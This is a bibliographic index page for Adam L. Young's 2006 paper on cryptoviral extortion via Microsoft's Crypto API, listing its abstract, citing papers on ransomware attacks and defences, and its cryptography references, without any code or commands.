Cryptoviral extortion using Microsoft's Crypto API

  title={Cryptoviral extortion using Microsoft's Crypto API},
  author={Adam L. Young},
  journal={International Journal of Information Security},
  • Adam L. Young
  • Published 1 April 2006
  • Computer Science
  • International Journal of Information Security
This paper presents the experimental results that were obtained by implementing the payload of a cryptovirus on the Microsoft Windows platform. The attack is based entirely on the Microsoft Cryptographic API and the needed API calls are covered in detail. More specifically, it is shown that by using eight types of API calls and 72 lines of C code, the payload can hybrid encrypt sensitive data and hold it hostage. Benchmarks are also given. A novel countermeasure against cryptoviral extortion… Expand

Figures from this paper

An Implementation of Cryptoviral Extortion Using Microsoft's Crypto API
This chapter presents an experimental implementation of cryptoviral extortion, an attack that we devised and presented at the 1996 IEEE Symposium on Security & Privacy [16] and that was recentlyExpand
An Implementation of Ransomware Malicious Software in Python
This paper presents an approach to developing ransomware in Python programming language that employs Nmap to determine if SSH port is open, and if it is, it enters the victim via SSH protocol. Expand
Overinfection in Ransomware
It is shown that the overinfection in ransomware can have four levels: Level 0 to ensure that the ransomware is not executed twice at the same time on the same machine, Level 1 to avoid re-encrypting its encrypted files, Level 2 to coordinate between its infections on thesame machine and Level 3 to manage the infection between many target machines in the same computer park. Expand
PayBreak: Defense Against Cryptographic Ransomware
The approach, prototype implementation, and evaluation of a novel, automated, and most importantly proactive defense mechanism against ransomware, called PayBreak, which effectively combats ransomware, and keeps victims' files safe. Expand
Vulnerability Analysis on the CNG Crypto Library
  • Kyungroul Lee, I. You, Kangbin Yim
  • Computer Science
  • 2015 9th International Conference on Innovative Mobile and Internet Services in Ubiquitous Computing
  • 2015
To prove the found vulnerability of CNG, a proof of-concept tool is implemented based on the details of the vulnerability and a countermeasure is proposed to improve security criteria for various applications to fully take advantage of the CNG library. Expand
Ransomware Analysis and Defense-WannaCry and the Win32 environment
To better understand the inner workings of this high-profile ransomware, a sample of WannaCry is obtained and the malware is dissected completely using advanced static and dynamic malware analysis techniques to enable cyber security experts to better thwart similar attacks in the future. Expand
A 0-Day Aware Crypto-Ransomware Early Behavioral Detection Framework
This paper puts forward an efficient and effective framework for building crypto-ransomware early detection models that protect users, whether individuals or organizations, of being victimized by such attack. Expand
Dynamic ransomware protection using deterministic random bit generator
A dynamic ransomware protection method that replaces the random number generator of the OS with a user-defined generator is proposed, and it is possible to recover an infected file system by reproducing the keys the attacker used to perform the encryption. Expand
Security Issues on the CNG Cryptography Library (Cryptography API: Next Generation)
Current security issues of CNG and the related considerations on it are introduced and research on security assurance is strongly required in the environment of distributing and utilizing the CNG library. Expand
Ransomware's Early Mitigation Mechanisms
A graph-based ransomware countermeasure to detect malicious threads is presented, a new mechanism that doesn't rely on previously used metrics in the literature to detect ransomware such as Shannon's entropy or system calls. Expand


Building a Cryptovirus Using Microsoft's Cryptographic API
It is shown that by using 8 types of API calls and 72 lines of ANSI C code, the payload can hybrid encrypt sensitive data and hold it hostage on the host computer system. Expand
Cryptovirology: extortion-based security threats and countermeasures
The idea of Cryptovirology is presented, which employs a twist on cryptography, showing that it can be used offensively to mount extortion based attacks that cause loss of access to information, loss of confidentiality, and information leakage, tasks which cryptography typically prevents. Expand
A method for obtaining digital signatures and public-key cryptosystems
An encryption method is presented with the novel property that publicly revealing an encryption key does not thereby reveal the corresponding decryption key, soriers or other secure means are not needed to transmit keys. Expand
Optimal Asymmetric Encryption
A slightly enhanced scheme is shown to have the property that the adversary can create ciphertexts only of strings for which she “knows” the corresponding plaintexts—such a scheme is not only semantically secure but also non-malleable and secure against chosen-ciphertext attack. Expand
A Practical Mix
We introduce a robust and efficient mix-network for exponentiation, and use it to obtain a threshold decryption mix-network for ElGamal encrypted messages, in which mix servers do not need to trustExpand
Untraceable electronic mail, return addresses, and digital pseudonyms
A technique based on public key cryptography is presented that allows an electronic mail system to hide who a participant communicates with as well as the content of the communication - in spite ofExpand
How Much Security Is Enough to Stop a Thief?: The Economics of Outsider Theft via Computer Systems and Networks
We address the question of how much security is required to protect a packaged system, installed in a large number of organizations, from thieves who would exploit a single vulnerability to attackExpand
Mixing E-mail with Babel
  • Ceki Gülcü, G. Tsudik
  • Computer Science
  • Proceedings of Internet Society Symposium on Network and Distributed Systems Security
  • 1996
An attempt is made to formalize and quantify certain dimensions of anonymity and untraceable communication in general and the design and salient features of Babel anonymous remailer are introduced. Expand
Almost entirely correct mixing with applications to voting
In order to design an exceptionally efficient mix network, both asymptotically and in real terms, the notion of almost entirely correct mixing is developed, and a new mix network is proposed that is almost entirelycorrect. Expand
Announcing Approval of Federal Information Processing Standard (FIPS) 180-2, Secure Hash Standard; a Revision of FIPS 180-2
  • Federal Register 67(165), 54785–54787
  • 2002